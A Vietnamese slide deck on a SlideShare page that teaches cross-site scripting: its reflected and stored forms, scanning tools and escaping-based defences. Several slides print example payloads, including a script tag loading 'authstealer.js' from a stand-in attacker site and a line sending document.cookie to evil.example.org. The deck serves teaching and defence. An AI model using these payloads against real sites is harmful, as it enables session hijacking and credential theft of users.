SlideShare a Scribd company logo

Xss

Download as PPTX, PDF
L
Linh Hoang

It is about XSS

Technology
1 of 16
Lỗi XSS - Cross-Site Scripting
Mục lục Các dạng tấn công Công cụ tìm kiếm lỗi Cách phòng chống lỗi
Khái niệm
Khái niệm •Lỗi XSS xảy ra khi một ứng dụng nhận vào những dữ liệu không đáng tin và gửi những dữ liệu đấy cho trình duyệt của người dùng • Ví dụ:một đoạn Javascript: <script%20src="http://mallorysevilsite.com/authstealer.js"> •Lỗi XSS thường giúp người khai thác chiếm phiên đăng nhập của người dùng, “deface” trang web hay dẫn người dùng đến những trang web lừa đảo
Các dạng lỗi Non-persistent Persistent
Non-persistent •Với dạng non-persistent, dữ liệu khai thác sẽ không được lưu trữ trên server.
A dùng trang web của B Trang web của B cho phép A lập tài khoản và chứa những thông tin riêng tư Trang web của B có lỗi XSS trong chức năng tìm kiếm http://bobssite.org?q=search term search term Non-persistent Ví dụ
• Chức năng tìm kiếm của trang web khi nhận được một query: • Trang web sẽ hiện ra "http://bobssite.org?q=puppies http://bobssite.org?q=puppies puppies puppies not found
• Chức năng tìm kiếm của trang web khi nhận được một query bất thường như: • Trang web sẽ hiện ra <script type='text/javascript'>alert('pwnd');</script> http://bobssite.org?q=<script… <script …. <script …. not found pwnd
• C tìm ra lỗi này của trang web B • C tạo ra URL • C gửi URL cho những thành viên của trang web B http://bobssite.org?q=puppies<script%20src="http://mallorysevilsite.com/authstealer.js"> Check out this cute puppy. http://bobssite.org?q=puppies< script%20…. From: c@email.com
•A nhận được email và click vào link •Link dẫn đến trang web của B và hiện ra “puppies not found” •Script authstealer.js trong URL được thực hiện •Script này lấy thông tin xác thực của A và gửi cho trang web của C Ví dụ: một đoạn trong authstealer.js new Image().src = 'http://evil.example.org/steal.php?cookies=' + encodeURI(document.cookie);
Persistent Với dạng Persistent, đoạn mã chèn thêm vào được lưu trữ trên server, như trong CSDL dưới dạng các comment trong blog, message trong forum hoặc các visitor log.
Ta có một trang web mà người dùng có thể để lại những lời nhắn như sau: Persistent Ví dụ
• Thay vì nhập vào lời nhắn bình thường, ta nhập vào đoạn mã sau: • Kết quả Xin <script>alert(“XSS”)</script>chào!
Công cụ tìm kiếm lỗi XSS Có khá nhiều công cụ miễn phí và thương mại để tìm kiếm lỗi XSS Grabber ZAP (OWASP) Wapiti
• “Escape” tất cả những dữ liệu không đáng tin cậy một cách hợp lý khi dữ liệu được đưa vào • Ví dụ: • Tham khảo thêm về HTML escaping: • Lập danh sách những dữ liệu được phép nhập vào • Ví dụ: Chỉ được nhập chữ cái, không được nhập ký tự đặc biệt • Với những dữ liệu như hình ảnh, video, có thể dùng những thư viện kiểm tra tự động như AntiSamy (OWASP) & --> &amp; < --> &lt; > --> &gt; https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet Tham khảo thêm về dự án AntiSamy: https://www.owasp.org/index.php/AntiSamy Cách phòng chống

Recommended

Tinh Ban Vs Tinh Yeu
Tinh Ban Vs Tinh YeuTinh Ban Vs Tinh Yeu
Tinh Ban Vs Tinh Yeuhuuthangvu
 
Xây dựng thương hiệu cá nhân
Xây dựng thương hiệu cá nhân Xây dựng thương hiệu cá nhân
Xây dựng thương hiệu cá nhân Vy Lai
 
Bắt đầu học data science
Bắt đầu học data scienceBắt đầu học data science
Bắt đầu học data scienceHong Ong
 
Bài thuyết trình về email
Bài thuyết trình về emailBài thuyết trình về email
Bài thuyết trình về emailLường Đại
 
bệnh Vô cảm
bệnh Vô cảmbệnh Vô cảm
bệnh Vô cảmHồng Nhung (Ỉn con)
 
ppt-bao-luc-ngon-tu.pptx
ppt-bao-luc-ngon-tu.pptxppt-bao-luc-ngon-tu.pptx
ppt-bao-luc-ngon-tu.pptxLhongTrn
 
Mẫu thiết kế Profile Tổng công ty thực phẩm Sagri
Mẫu thiết kế Profile Tổng công ty thực phẩm SagriMẫu thiết kế Profile Tổng công ty thực phẩm Sagri
Mẫu thiết kế Profile Tổng công ty thực phẩm SagriSaoKim.com.vn
 
TS. BÙI QUANG XUÂN NGHỆ THUẬT LÃNH ĐẠO
TS. BÙI QUANG XUÂN NGHỆ THUẬT LÃNH ĐẠO TS. BÙI QUANG XUÂN NGHỆ THUẬT LÃNH ĐẠO
TS. BÙI QUANG XUÂN NGHỆ THUẬT LÃNH ĐẠO Bùi Quang Xuân
 

Recommended

Tinh Ban Vs Tinh Yeu
Tinh Ban Vs Tinh YeuTinh Ban Vs Tinh Yeu
Tinh Ban Vs Tinh Yeuhuuthangvu
 
Xây dựng thương hiệu cá nhân
Xây dựng thương hiệu cá nhân Xây dựng thương hiệu cá nhân
Xây dựng thương hiệu cá nhân Vy Lai
 
Bắt đầu học data science
Bắt đầu học data scienceBắt đầu học data science
Bắt đầu học data scienceHong Ong
 
Bài thuyết trình về email
Bài thuyết trình về emailBài thuyết trình về email
Bài thuyết trình về emailLường Đại
 
bệnh Vô cảm
bệnh Vô cảmbệnh Vô cảm
bệnh Vô cảmHồng Nhung (Ỉn con)
 
ppt-bao-luc-ngon-tu.pptx
ppt-bao-luc-ngon-tu.pptxppt-bao-luc-ngon-tu.pptx
ppt-bao-luc-ngon-tu.pptxLhongTrn
 
Mẫu thiết kế Profile Tổng công ty thực phẩm Sagri
Mẫu thiết kế Profile Tổng công ty thực phẩm SagriMẫu thiết kế Profile Tổng công ty thực phẩm Sagri
Mẫu thiết kế Profile Tổng công ty thực phẩm SagriSaoKim.com.vn
 
TS. BÙI QUANG XUÂN NGHỆ THUẬT LÃNH ĐẠO
TS. BÙI QUANG XUÂN NGHỆ THUẬT LÃNH ĐẠO TS. BÙI QUANG XUÂN NGHỆ THUẬT LÃNH ĐẠO
TS. BÙI QUANG XUÂN NGHỆ THUẬT LÃNH ĐẠO Bùi Quang Xuân
 
Mẫu thiết kế Profile Công ty CNTT VDC
Mẫu thiết kế Profile Công ty CNTT VDCMẫu thiết kế Profile Công ty CNTT VDC
Mẫu thiết kế Profile Công ty CNTT VDCSaoKim.com.vn
 
Xây dựng thương hiệu cá nhân bằng facebook
Xây dựng thương hiệu cá nhân bằng facebookXây dựng thương hiệu cá nhân bằng facebook
Xây dựng thương hiệu cá nhân bằng facebooktoanwinvietnam
 
Trắc nghiệm Kinh tế chính trị - Phần 1
Trắc nghiệm Kinh tế chính trị - Phần 1Trắc nghiệm Kinh tế chính trị - Phần 1
Trắc nghiệm Kinh tế chính trị - Phần 1vietlod.com
 
Xây Dựng Thương Hiệu Cá Nhân Trên Facebook
Xây Dựng Thương Hiệu Cá Nhân Trên FacebookXây Dựng Thương Hiệu Cá Nhân Trên Facebook
Xây Dựng Thương Hiệu Cá Nhân Trên FacebookNhân Nguyễn Sỹ
 
Business Model Canvas (Khung Mô Hình Kinh Doanh)
Business Model Canvas (Khung Mô Hình Kinh Doanh)Business Model Canvas (Khung Mô Hình Kinh Doanh)
Business Model Canvas (Khung Mô Hình Kinh Doanh)Nguyen Ngoc Binh Phuong
 
Startup - Khởi nghiệp
Startup - Khởi nghiệpStartup - Khởi nghiệp
Startup - Khởi nghiệpHoang Nguyen
 
Xhh Cong Tac Xa Hoi Ca Nhan
Xhh Cong Tac Xa Hoi Ca NhanXhh Cong Tac Xa Hoi Ca Nhan
Xhh Cong Tac Xa Hoi Ca Nhanmai vân
 
Hồ sơ năng lực Công ty TNHH TM và DV Đèn Sao Việt
Hồ sơ năng lực Công ty TNHH TM và DV Đèn Sao ViệtHồ sơ năng lực Công ty TNHH TM và DV Đèn Sao Việt
Hồ sơ năng lực Công ty TNHH TM và DV Đèn Sao ViệtCông ty TNHH TM và DV Đèn Sao Việt
 
Luyện cách hỏi
Luyện cách hỏi Luyện cách hỏi
Luyện cách hỏi DUONG Trong Tan
 
Chuong 5
Chuong 5Chuong 5
Chuong 5Nhat Nguyen
 
Mẫu thiết kế profile Công ty Phân phối FSI
Mẫu thiết kế profile Công ty Phân phối FSIMẫu thiết kế profile Công ty Phân phối FSI
Mẫu thiết kế profile Công ty Phân phối FSISaoKim.com.vn
 
Bài 3 making arrangements to meet a friend
Bài 3 making arrangements to meet a friendBài 3 making arrangements to meet a friend
Bài 3 making arrangements to meet a friendHọc Huỳnh Bá
 
Bài Giảng Phòng Ngừa Xâm Hại Tình Dục Trẻ Em
Bài Giảng Phòng Ngừa Xâm Hại Tình Dục Trẻ Em Bài Giảng Phòng Ngừa Xâm Hại Tình Dục Trẻ Em
Bài Giảng Phòng Ngừa Xâm Hại Tình Dục Trẻ Em nataliej4
 
Chương 3: hệ thống công việc và hệ thống thông tin
Chương 3: hệ thống công việc và hệ thống thông tin Chương 3: hệ thống công việc và hệ thống thông tin
Chương 3: hệ thống công việc và hệ thống thông tin Thạc sĩ Vũ Ngọc Hiếu
 
Luật AN TOÀN MẠNG
Luật AN TOÀN MẠNGLuật AN TOÀN MẠNG
Luật AN TOÀN MẠNGtungvtqt
 
13690151 slide-phan-tich-thiet-ke-he-thong-huong-doi-tuong-dai-hoc-bach-khoa-...
13690151 slide-phan-tich-thiet-ke-he-thong-huong-doi-tuong-dai-hoc-bach-khoa-...13690151 slide-phan-tich-thiet-ke-he-thong-huong-doi-tuong-dai-hoc-bach-khoa-...
13690151 slide-phan-tich-thiet-ke-he-thong-huong-doi-tuong-dai-hoc-bach-khoa-...leethinh
 
Bản chất hiện tượng tâm lý người
Bản chất hiện tượng tâm lý ngườiBản chất hiện tượng tâm lý người
Bản chất hiện tượng tâm lý ngườiNgoc Tran Bich
 
SaoKim Branding Company Profile
SaoKim Branding Company Profile SaoKim Branding Company Profile
SaoKim Branding Company Profile SaoKim.com.vn
 
Hướng dẫn viết email trong doanh nghiệp
Hướng dẫn viết email trong doanh nghiệpHướng dẫn viết email trong doanh nghiệp
Hướng dẫn viết email trong doanh nghiệpTran Kien
 
Thương hiệu cá nhân cho Lãnh đạo - Personal Branding for Leader
Thương hiệu cá nhân cho Lãnh đạo - Personal Branding for LeaderThương hiệu cá nhân cho Lãnh đạo - Personal Branding for Leader
Thương hiệu cá nhân cho Lãnh đạo - Personal Branding for LeaderTHANHS BRANDING & MANAGEMENT COMPANY
 
Fine Art Market
Fine Art MarketFine Art Market
Fine Art MarketKatrina Aleksa
 
PM [B10] In comes Euler
PM [B10] In comes EulerPM [B10] In comes Euler
PM [B10] In comes EulerStephen Kwong
 

More Related Content

What's hot

Mẫu thiết kế Profile Công ty CNTT VDC
Mẫu thiết kế Profile Công ty CNTT VDCMẫu thiết kế Profile Công ty CNTT VDC
Mẫu thiết kế Profile Công ty CNTT VDCSaoKim.com.vn
 
Xây dựng thương hiệu cá nhân bằng facebook
Xây dựng thương hiệu cá nhân bằng facebookXây dựng thương hiệu cá nhân bằng facebook
Xây dựng thương hiệu cá nhân bằng facebooktoanwinvietnam
 
Trắc nghiệm Kinh tế chính trị - Phần 1
Trắc nghiệm Kinh tế chính trị - Phần 1Trắc nghiệm Kinh tế chính trị - Phần 1
Trắc nghiệm Kinh tế chính trị - Phần 1vietlod.com
 
Xây Dựng Thương Hiệu Cá Nhân Trên Facebook
Xây Dựng Thương Hiệu Cá Nhân Trên FacebookXây Dựng Thương Hiệu Cá Nhân Trên Facebook
Xây Dựng Thương Hiệu Cá Nhân Trên FacebookNhân Nguyễn Sỹ
 
Business Model Canvas (Khung Mô Hình Kinh Doanh)
Business Model Canvas (Khung Mô Hình Kinh Doanh)Business Model Canvas (Khung Mô Hình Kinh Doanh)
Business Model Canvas (Khung Mô Hình Kinh Doanh)Nguyen Ngoc Binh Phuong
 
Startup - Khởi nghiệp
Startup - Khởi nghiệpStartup - Khởi nghiệp
Startup - Khởi nghiệpHoang Nguyen
 
Xhh Cong Tac Xa Hoi Ca Nhan
Xhh Cong Tac Xa Hoi Ca NhanXhh Cong Tac Xa Hoi Ca Nhan
Xhh Cong Tac Xa Hoi Ca Nhanmai vân
 
Mẫu thiết kế profile Công ty Phân phối FSI
Mẫu thiết kế profile Công ty Phân phối FSIMẫu thiết kế profile Công ty Phân phối FSI
Mẫu thiết kế profile Công ty Phân phối FSISaoKim.com.vn
 
Bài 3 making arrangements to meet a friend
Bài 3 making arrangements to meet a friendBài 3 making arrangements to meet a friend
Bài 3 making arrangements to meet a friendHọc Huỳnh Bá
 
Bài Giảng Phòng Ngừa Xâm Hại Tình Dục Trẻ Em
Bài Giảng Phòng Ngừa Xâm Hại Tình Dục Trẻ Em Bài Giảng Phòng Ngừa Xâm Hại Tình Dục Trẻ Em
Bài Giảng Phòng Ngừa Xâm Hại Tình Dục Trẻ Em nataliej4
 
Chương 3: hệ thống công việc và hệ thống thông tin
Chương 3: hệ thống công việc và hệ thống thông tin Chương 3: hệ thống công việc và hệ thống thông tin
Chương 3: hệ thống công việc và hệ thống thông tin Thạc sĩ Vũ Ngọc Hiếu
 
Luật AN TOÀN MẠNG
Luật AN TOÀN MẠNGLuật AN TOÀN MẠNG
Luật AN TOÀN MẠNGtungvtqt
 
13690151 slide-phan-tich-thiet-ke-he-thong-huong-doi-tuong-dai-hoc-bach-khoa-...
13690151 slide-phan-tich-thiet-ke-he-thong-huong-doi-tuong-dai-hoc-bach-khoa-...13690151 slide-phan-tich-thiet-ke-he-thong-huong-doi-tuong-dai-hoc-bach-khoa-...
13690151 slide-phan-tich-thiet-ke-he-thong-huong-doi-tuong-dai-hoc-bach-khoa-...leethinh
 
Bản chất hiện tượng tâm lý người
Bản chất hiện tượng tâm lý ngườiBản chất hiện tượng tâm lý người
Bản chất hiện tượng tâm lý ngườiNgoc Tran Bich
 
SaoKim Branding Company Profile
SaoKim Branding Company Profile SaoKim Branding Company Profile
SaoKim Branding Company Profile SaoKim.com.vn
 
Hướng dẫn viết email trong doanh nghiệp
Hướng dẫn viết email trong doanh nghiệpHướng dẫn viết email trong doanh nghiệp
Hướng dẫn viết email trong doanh nghiệpTran Kien
 
Thương hiệu cá nhân cho Lãnh đạo - Personal Branding for Leader
Thương hiệu cá nhân cho Lãnh đạo - Personal Branding for LeaderThương hiệu cá nhân cho Lãnh đạo - Personal Branding for Leader
Thương hiệu cá nhân cho Lãnh đạo - Personal Branding for LeaderTHANHS BRANDING & MANAGEMENT COMPANY
 

What's hot (20)

Mẫu thiết kế Profile Công ty CNTT VDC
Mẫu thiết kế Profile Công ty CNTT VDCMẫu thiết kế Profile Công ty CNTT VDC
Mẫu thiết kế Profile Công ty CNTT VDC
 
Xây dựng thương hiệu cá nhân bằng facebook
Xây dựng thương hiệu cá nhân bằng facebookXây dựng thương hiệu cá nhân bằng facebook
Xây dựng thương hiệu cá nhân bằng facebook
 
Trắc nghiệm Kinh tế chính trị - Phần 1
Trắc nghiệm Kinh tế chính trị - Phần 1Trắc nghiệm Kinh tế chính trị - Phần 1
Trắc nghiệm Kinh tế chính trị - Phần 1
 
Xây Dựng Thương Hiệu Cá Nhân Trên Facebook
Xây Dựng Thương Hiệu Cá Nhân Trên FacebookXây Dựng Thương Hiệu Cá Nhân Trên Facebook
Xây Dựng Thương Hiệu Cá Nhân Trên Facebook
 
Business Model Canvas (Khung Mô Hình Kinh Doanh)
Business Model Canvas (Khung Mô Hình Kinh Doanh)Business Model Canvas (Khung Mô Hình Kinh Doanh)
Business Model Canvas (Khung Mô Hình Kinh Doanh)
 
Startup - Khởi nghiệp
Startup - Khởi nghiệpStartup - Khởi nghiệp
Startup - Khởi nghiệp
 
Xhh Cong Tac Xa Hoi Ca Nhan
Xhh Cong Tac Xa Hoi Ca NhanXhh Cong Tac Xa Hoi Ca Nhan
Xhh Cong Tac Xa Hoi Ca Nhan
 
Hồ sơ năng lực Công ty TNHH TM và DV Đèn Sao Việt
Hồ sơ năng lực Công ty TNHH TM và DV Đèn Sao ViệtHồ sơ năng lực Công ty TNHH TM và DV Đèn Sao Việt
Hồ sơ năng lực Công ty TNHH TM và DV Đèn Sao Việt
 
Luyện cách hỏi
Luyện cách hỏi Luyện cách hỏi
Luyện cách hỏi
 
Chuong 5
Chuong 5Chuong 5
Chuong 5
 
Mẫu thiết kế profile Công ty Phân phối FSI
Mẫu thiết kế profile Công ty Phân phối FSIMẫu thiết kế profile Công ty Phân phối FSI
Mẫu thiết kế profile Công ty Phân phối FSI
 
Bài 3 making arrangements to meet a friend
Bài 3 making arrangements to meet a friendBài 3 making arrangements to meet a friend
Bài 3 making arrangements to meet a friend
 
Bài Giảng Phòng Ngừa Xâm Hại Tình Dục Trẻ Em
Bài Giảng Phòng Ngừa Xâm Hại Tình Dục Trẻ Em Bài Giảng Phòng Ngừa Xâm Hại Tình Dục Trẻ Em
Bài Giảng Phòng Ngừa Xâm Hại Tình Dục Trẻ Em
 
Chương 3: hệ thống công việc và hệ thống thông tin
Chương 3: hệ thống công việc và hệ thống thông tin Chương 3: hệ thống công việc và hệ thống thông tin
Chương 3: hệ thống công việc và hệ thống thông tin
 
Luật AN TOÀN MẠNG
Luật AN TOÀN MẠNGLuật AN TOÀN MẠNG
Luật AN TOÀN MẠNG
 
13690151 slide-phan-tich-thiet-ke-he-thong-huong-doi-tuong-dai-hoc-bach-khoa-...
13690151 slide-phan-tich-thiet-ke-he-thong-huong-doi-tuong-dai-hoc-bach-khoa-...13690151 slide-phan-tich-thiet-ke-he-thong-huong-doi-tuong-dai-hoc-bach-khoa-...
13690151 slide-phan-tich-thiet-ke-he-thong-huong-doi-tuong-dai-hoc-bach-khoa-...
 
Bản chất hiện tượng tâm lý người
Bản chất hiện tượng tâm lý ngườiBản chất hiện tượng tâm lý người
Bản chất hiện tượng tâm lý người
 
SaoKim Branding Company Profile
SaoKim Branding Company Profile SaoKim Branding Company Profile
SaoKim Branding Company Profile
 
Hướng dẫn viết email trong doanh nghiệp
Hướng dẫn viết email trong doanh nghiệpHướng dẫn viết email trong doanh nghiệp
Hướng dẫn viết email trong doanh nghiệp
 
Thương hiệu cá nhân cho Lãnh đạo - Personal Branding for Leader
Thương hiệu cá nhân cho Lãnh đạo - Personal Branding for LeaderThương hiệu cá nhân cho Lãnh đạo - Personal Branding for Leader
Thương hiệu cá nhân cho Lãnh đạo - Personal Branding for Leader
 

Viewers also liked

PM [B10] In comes Euler
PM [B10] In comes EulerPM [B10] In comes Euler
PM [B10] In comes EulerStephen Kwong
 
listtoclose demo
listtoclose demolisttoclose demo
listtoclose demopcanthony
 
5 Body Parts That You Are Not Cleaning Properly
5 Body Parts That You Are Not Cleaning Properly5 Body Parts That You Are Not Cleaning Properly
5 Body Parts That You Are Not Cleaning ProperlyHealth Care At Home India
 
ACO Based Routing and Euler Walks Routing of Solid Waste Management Transport...
ACO Based Routing and Euler Walks Routing of Solid Waste Management Transport...ACO Based Routing and Euler Walks Routing of Solid Waste Management Transport...
ACO Based Routing and Euler Walks Routing of Solid Waste Management Transport...AM Publications
 
Data Preparation for Assessing Impact of Climate Change on Groundwater Recharge
Data Preparation for Assessing Impact of Climate Change on Groundwater RechargeData Preparation for Assessing Impact of Climate Change on Groundwater Recharge
Data Preparation for Assessing Impact of Climate Change on Groundwater RechargeAM Publications
 

Viewers also liked (13)

Fine Art Market
Fine Art MarketFine Art Market
Fine Art Market
 
PM [B10] In comes Euler
PM [B10] In comes EulerPM [B10] In comes Euler
PM [B10] In comes Euler
 
Mule smtp connector
Mule smtp connectorMule smtp connector
Mule smtp connector
 
Bm 1 pgp30230
Bm 1 pgp30230Bm 1 pgp30230
Bm 1 pgp30230
 
listtoclose demo
listtoclose demolisttoclose demo
listtoclose demo
 
02 Dasar-dasar Desain
02 Dasar-dasar Desain02 Dasar-dasar Desain
02 Dasar-dasar Desain
 
5 Body Parts That You Are Not Cleaning Properly
5 Body Parts That You Are Not Cleaning Properly5 Body Parts That You Are Not Cleaning Properly
5 Body Parts That You Are Not Cleaning Properly
 
Как сократить расходы на международную связь?
Как сократить расходы на международную связь?Как сократить расходы на международную связь?
Как сократить расходы на международную связь?
 
2581
25812581
2581
 
Solstis profile and references
Solstis profile and referencesSolstis profile and references
Solstis profile and references
 
ACO Based Routing and Euler Walks Routing of Solid Waste Management Transport...
ACO Based Routing and Euler Walks Routing of Solid Waste Management Transport...ACO Based Routing and Euler Walks Routing of Solid Waste Management Transport...
ACO Based Routing and Euler Walks Routing of Solid Waste Management Transport...
 
linked in resume
linked in resumelinked in resume
linked in resume
 
Data Preparation for Assessing Impact of Climate Change on Groundwater Recharge
Data Preparation for Assessing Impact of Climate Change on Groundwater RechargeData Preparation for Assessing Impact of Climate Change on Groundwater Recharge
Data Preparation for Assessing Impact of Climate Change on Groundwater Recharge
 

Similar to Xss

Những lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần applicationNhững lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần applicationNgoc Dao
 
Tan cong
Tan congTan cong
Tan congtoan
 
Dos web server it-slideshares.blogspot.com
Dos web server it-slideshares.blogspot.comDos web server it-slideshares.blogspot.com
Dos web server it-slideshares.blogspot.comphanleson
 
Web application-security
Web application-securityWeb application-security
Web application-securityVisla Team
 
một số phương pháp tấn công và phòng chống trong không gian mạng
một số phương pháp tấn công và phòng chống trong không gian mạngmột số phương pháp tấn công và phòng chống trong không gian mạng
một số phương pháp tấn công và phòng chống trong không gian mạngNguynQuangKhangMinh
 
Bao cao tttn an ninh web
Bao cao tttn an ninh webBao cao tttn an ninh web
Bao cao tttn an ninh webNhóc Mèo
 
Báo cáo SQL injecttion
Báo cáo SQL injecttionBáo cáo SQL injecttion
Báo cáo SQL injecttionDuy Nguyenduc
 
Tiền ảo đã ký sinh trên web của bạn như thế nào?
Tiền ảo đã ký sinh trên web của bạn như thế nào?Tiền ảo đã ký sinh trên web của bạn như thế nào?
Tiền ảo đã ký sinh trên web của bạn như thế nào?Lan Do
 
Tim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongTim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongVu Trung Kien
 
An Ninh Mạng Và Kỹ Thuật Tấn Công Web Server
An Ninh Mạng Và Kỹ Thuật Tấn Công Web Server An Ninh Mạng Và Kỹ Thuật Tấn Công Web Server
An Ninh Mạng Và Kỹ Thuật Tấn Công Web Server nataliej4
 
Sql injection demo - it-slideshares.blogspot.com
Sql injection demo - it-slideshares.blogspot.comSql injection demo - it-slideshares.blogspot.com
Sql injection demo - it-slideshares.blogspot.comphanleson
 
Bảo mật ứng dụng ASP.NET
Bảo mật ứng dụng ASP.NETBảo mật ứng dụng ASP.NET
Bảo mật ứng dụng ASP.NETHUST
 
Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)Luc Cao
 
Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)Luc Cao
 
Bài 1: Làm quen với ASP.NET - Giáo trình FPT - Có ví dụ kèm theo
Bài 1: Làm quen với ASP.NET - Giáo trình FPT - Có ví dụ kèm theoBài 1: Làm quen với ASP.NET - Giáo trình FPT - Có ví dụ kèm theo
Bài 1: Làm quen với ASP.NET - Giáo trình FPT - Có ví dụ kèm theoMasterCode.vn
 
Trung tâm đào tạo
Trung tâm đào tạoTrung tâm đào tạo
Trung tâm đào tạoLuc Cao
 

Similar to Xss (20)

Owasp top 10
Owasp top 10Owasp top 10
Owasp top 10
 
Những lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần applicationNhững lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần application
 
Đề tài: Giao thức http và https trong bảo mật website, HAY - Gửi miễn phí...
Đề tài: Giao thức http và https trong bảo mật website, HAY - Gửi miễn phí...Đề tài: Giao thức http và https trong bảo mật website, HAY - Gửi miễn phí...
Đề tài: Giao thức http và https trong bảo mật website, HAY - Gửi miễn phí...
 
Tan cong
Tan congTan cong
Tan cong
 
Bảo mật ứng dụng web
Bảo mật ứng dụng webBảo mật ứng dụng web
Bảo mật ứng dụng web
 
Dos web server it-slideshares.blogspot.com
Dos web server it-slideshares.blogspot.comDos web server it-slideshares.blogspot.com
Dos web server it-slideshares.blogspot.com
 
Web application-security
Web application-securityWeb application-security
Web application-security
 
một số phương pháp tấn công và phòng chống trong không gian mạng
một số phương pháp tấn công và phòng chống trong không gian mạngmột số phương pháp tấn công và phòng chống trong không gian mạng
một số phương pháp tấn công và phòng chống trong không gian mạng
 
Bao cao tttn an ninh web
Bao cao tttn an ninh webBao cao tttn an ninh web
Bao cao tttn an ninh web
 
Báo cáo SQL injecttion
Báo cáo SQL injecttionBáo cáo SQL injecttion
Báo cáo SQL injecttion
 
Tiền ảo đã ký sinh trên web của bạn như thế nào?
Tiền ảo đã ký sinh trên web của bạn như thế nào?Tiền ảo đã ký sinh trên web của bạn như thế nào?
Tiền ảo đã ký sinh trên web của bạn như thế nào?
 
Tim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongTim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chong
 
An Ninh Mạng Và Kỹ Thuật Tấn Công Web Server
An Ninh Mạng Và Kỹ Thuật Tấn Công Web Server An Ninh Mạng Và Kỹ Thuật Tấn Công Web Server
An Ninh Mạng Và Kỹ Thuật Tấn Công Web Server
 
Sql injection demo - it-slideshares.blogspot.com
Sql injection demo - it-slideshares.blogspot.comSql injection demo - it-slideshares.blogspot.com
Sql injection demo - it-slideshares.blogspot.com
 
Bảo mật ứng dụng ASP.NET
Bảo mật ứng dụng ASP.NETBảo mật ứng dụng ASP.NET
Bảo mật ứng dụng ASP.NET
 
Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)
 
Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)
 
Bai 11
Bai 11Bai 11
Bai 11
 
Bài 1: Làm quen với ASP.NET - Giáo trình FPT - Có ví dụ kèm theo
Bài 1: Làm quen với ASP.NET - Giáo trình FPT - Có ví dụ kèm theoBài 1: Làm quen với ASP.NET - Giáo trình FPT - Có ví dụ kèm theo
Bài 1: Làm quen với ASP.NET - Giáo trình FPT - Có ví dụ kèm theo
 
Trung tâm đào tạo
Trung tâm đào tạoTrung tâm đào tạo
Trung tâm đào tạo
 

Xss

  • 1. Lỗi XSS - Cross-Site Scripting
  • 2. Mục lục Các dạng tấn công Công cụ tìm kiếm lỗi Cách phòng chống lỗi
  • 4. Khái niệm •Lỗi XSS xảy ra khi một ứng dụng nhận vào những dữ liệu không đáng tin và gửi những dữ liệu đấy cho trình duyệt của người dùng • Ví dụ:một đoạn Javascript: <script%20src="http://mallorysevilsite.com/authstealer.js"> •Lỗi XSS thường giúp người khai thác chiếm phiên đăng nhập của người dùng, “deface” trang web hay dẫn người dùng đến những trang web lừa đảo
  • 6. Non-persistent •Với dạng non-persistent, dữ liệu khai thác sẽ không được lưu trữ trên server.
  • 7. A dùng trang web của B Trang web của B cho phép A lập tài khoản và chứa những thông tin riêng tư Trang web của B có lỗi XSS trong chức năng tìm kiếm http://bobssite.org?q=search term search term Non-persistent Ví dụ
  • 8. • Chức năng tìm kiếm của trang web khi nhận được một query: • Trang web sẽ hiện ra "http://bobssite.org?q=puppies http://bobssite.org?q=puppies puppies puppies not found
  • 9. • Chức năng tìm kiếm của trang web khi nhận được một query bất thường như: • Trang web sẽ hiện ra <script type='text/javascript'>alert('pwnd');</script> http://bobssite.org?q=<script… <script …. <script …. not found pwnd
  • 10. • C tìm ra lỗi này của trang web B • C tạo ra URL • C gửi URL cho những thành viên của trang web B http://bobssite.org?q=puppies<script%20src="http://mallorysevilsite.com/authstealer.js"> Check out this cute puppy. http://bobssite.org?q=puppies< script%20…. From: c@email.com
  • 11. •A nhận được email và click vào link •Link dẫn đến trang web của B và hiện ra “puppies not found” •Script authstealer.js trong URL được thực hiện •Script này lấy thông tin xác thực của A và gửi cho trang web của C Ví dụ: một đoạn trong authstealer.js new Image().src = 'http://evil.example.org/steal.php?cookies=' + encodeURI(document.cookie);
  • 12. Persistent Với dạng Persistent, đoạn mã chèn thêm vào được lưu trữ trên server, như trong CSDL dưới dạng các comment trong blog, message trong forum hoặc các visitor log.
  • 13. Ta có một trang web mà người dùng có thể để lại những lời nhắn như sau: Persistent Ví dụ
  • 14. • Thay vì nhập vào lời nhắn bình thường, ta nhập vào đoạn mã sau: • Kết quả Xin <script>alert(“XSS”)</script>chào!
  • 15. Công cụ tìm kiếm lỗi XSS Có khá nhiều công cụ miễn phí và thương mại để tìm kiếm lỗi XSS Grabber ZAP (OWASP) Wapiti
